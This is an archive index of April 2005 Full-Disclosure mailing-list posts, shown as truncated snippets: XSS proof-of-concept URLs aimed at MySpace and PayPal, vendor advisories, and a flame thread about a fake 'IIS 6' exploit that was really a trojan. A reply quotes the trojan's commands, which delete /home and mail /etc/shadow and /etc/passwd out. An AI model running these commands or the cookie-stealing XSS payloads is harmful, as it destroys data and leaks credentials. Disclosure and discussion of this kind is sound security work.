Re: [Full-disclosure] Big Sites That Are Vulnerable To XSS

2005-04-20 Thread Morning Wood
toss this one in... http://www.myspace.com/index.cfm?fuseaction=find&circuitaction=search&searchType=network&interesttype=&f_first_name=http://whatismyip.com";>&Submit=Find i think redirects are more effective in showing xss, but cookies are nice too or other xss like alert(document.cookie); wood

[Full-disclosure] File Selection May Lead to Command Execution (GM#015-IE)

2005-04-20 Thread GreyMagic Security
GreyMagic Security Advisory GM#015-IE = By GreyMagic Software. 19 Apr 2005. Available in HTML format at http://www.greymagic.com/security/advisories/gm015-ie/. Topic: File Selection May Lead to Command Execution. Discovery date: 18 Jan 2005. Affected applica

[Full-disclosure] Big Sites That Are Vulnerable To XSS

2005-04-20 Thread tuytumadre
The following have been previously reposibly disclosed, and, because of the lack of action taken on the venders' parts, full disclosure is necessary to elliminate the threat of what's called "security by obscurity." paypal.com http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside-->ale

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

2005-04-20 Thread Valdis . Kletnieks
On Wed, 20 Apr 2005 17:35:56 PDT, Day Jay said: > Get your "wrap-around" text fixed you fucking fed!! > --- John McGuire <[EMAIL PROTECTED]> wrote: Yep, must be a fed. The 'leet black hats would be posting from @fbi.gov, and the not-so-leet ones would at least have the good taste to find a bette

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

2005-04-20 Thread Steve Friedl
On Thu, Apr 21, 2005 at 01:24:27AM +, [EMAIL PROTECTED] wrote: > I don't think that FD is moderated. I know it's not: there is something to be said for lists that *are* :-) > Day Jay sounds like a real asshat, eh Steve? Yes, quite the asshat. Funny the first time, but not the 10th. How you

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

2005-04-20 Thread tuytumadre
> On Wed, Apr 20, 2005 at 05:35:56PM -0700, Day Jay wrote: > > Get your "wrap-around" text fixed you fucking fed!! > > I'm fed up with you!! > > > > Jeezsus, expose yourself as such. hehehe > > > > dumfux > > I guess there's something to be said for moderated lists, eh? I don't think th

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broke

2005-04-20 Thread happy man
man, that code is crap!!! ive run that shit on all 6 of my boxes at home and it still no work. i'm gonna try it again when i get home and if it still no work, i am going to run some other 1337 hacker code so i can pwn. __

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

2005-04-20 Thread Steve Friedl
On Wed, Apr 20, 2005 at 05:35:56PM -0700, Day Jay wrote: > Get your "wrap-around" text fixed you fucking fed!! > I'm fed up with you!! > > Jeezsus, expose yourself as such. hehehe > > dumfux I guess there's something to be said for moderated lists, eh? --- Stephen J Friedl | Security Consultan

RE: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

2005-04-20 Thread Day Jay
Get your "wrap-around" text fixed you fucking fed!! I'm fed up with you!! Jeezsus, expose yourself as such. hehehe dumfux --- John McGuire <[EMAIL PROTECTED]> wrote: > Touchy, touchy ;) At least people could appreciate > the first posting as a > decent, if fairly cruel, joke on those that run >

RE: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

2005-04-20 Thread John McGuire
Touchy, touchy ;) At least people could appreciate the first posting as a decent, if fairly cruel, joke on those that run unknown code at the drop of a hat. To start bitching and ranting just because your code was exposed for what it is, though, is rather sad. I'm hoping the below posting was just

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread Day Jay
You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C program

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread Day Jay
Yes it is you hat squad lammer newbie. Now get it to work!! You fucking newbie. You're so lame and so is your file system. --- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote: > perfect asshole > > - > class101 > Jr. Researcher > Hat-Squ

[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Dear DIk, You are thinking local buffer overflows with your "think: ret=(int *)&ret+2;(*ret)=(int)shellcode;" Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's alittle different!! Damn newbie! I mean, how lame are you? --- dk <[E

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread [EMAIL PROTECTED]
perfect asshole - class101 Jr. Researcher Hat-Squad.com - - Original Message - From: "Day Jay" <[EMAIL PROTECTED]> To: Sent: Wednesday, April 20, 2005 8:15 PM Subject: [

Re: [Full-disclosure] FW: Introducing a new generic approach to detecting SQL injection

2005-04-20 Thread Mohit Muthanna
> As you know, blocking SQL injection with filters on characters is painful and > not always successful. I got thinking about it and thought of an approach Painful? That's just an excuse for being lazy. (No offense intended.) Not always successful? ... I don't get this, why not? There are a numb

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread James Longstreet
Cute. shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe" launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk " netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk " On Wed, 20 Apr 2005, Day Jay wrote: > Sorry, the previous code was broken. This code sh

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread dk
Day Jay wrote: Sorry, the previous code was broken. Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;] ;-) -- dk _

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Dunceor .
that has to be like the worst backdooring ever. The printf()'s are not even there :P On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote: > Sorry, the previous code was broken. This code should > work... > > Happy Owning!! :) > > =SNIP > /* Proof of concept code >Please don't s

[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS

[Full-disclosure] RE: iDEFENSE Security Advisory 04.18.05: McAfee Internet Security Suite 2005 Insecure File Permission Vulnerability

2005-04-20 Thread Boyce, Nick
Hmmm ... [Section VI. Vendor Response] "This issue affects an extremely small subset of the McAfee Internet Security Suite 2005 user base as the vast majority of home users do not use non-Administrator Windows accounts" "McAfee's key priority is the security of our customers."

[Full-disclosure] RealNetworks RealPlayer/RealOne Player/Helix Player Remote Heap Overflow

2005-04-20 Thread Piotr Bania
RealNetworks RealPlayer/RealOne Player/Helix Player Remote Heap Overflow by Piotr Bania <[EMAIL PROTECTED]> http://pb.specialised.info Original location: http://pb.specialised.info/all/adv/real-ram-adv.txt Severity

[Full-disclosure] IE6 kicks Firefox's BUG : Local Information Disclosure

2005-04-20 Thread bitlance winter
Hello , all. IE6 kicks Firefox's BUG : Local Information Disclosure. MIME types (commonly used on the web) determine what kind of content is being sent down and give the browser an idea of how to parse,render or otherwise deal with the content. "application/zip", for example, is what's sent by the

[Full-disclosure] [SECURITY] [DSA 661-2] New f2c packages fix insecure temporary files

2005-04-20 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 661-2 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze April 20th, 2005

[Full-disclosure] SUSE Security Announcement: PostgreSQL buffer overflow problems (SUSE-SA-2005:027)

2005-04-20 Thread Marcus Meissner
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:postgresql Announcement-ID:SUSE-SA:2005:027 Date: Wed, 2

[Full-disclosure] SUSE Security Announcement: RealPlayer buffer overflow in RAM file handling (SUSE-SA:2005:026)

2005-04-20 Thread Marcus Meissner
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:RealPlayer Announcement-ID:SUSE-SA:2005:026 Date: Wed, 2

[Full-disclosure] [ GLSA 200504-19 ] MPlayer: Two heap overflow vulnerabilities

2005-04-20 Thread Matthias Geerdsen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200504-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -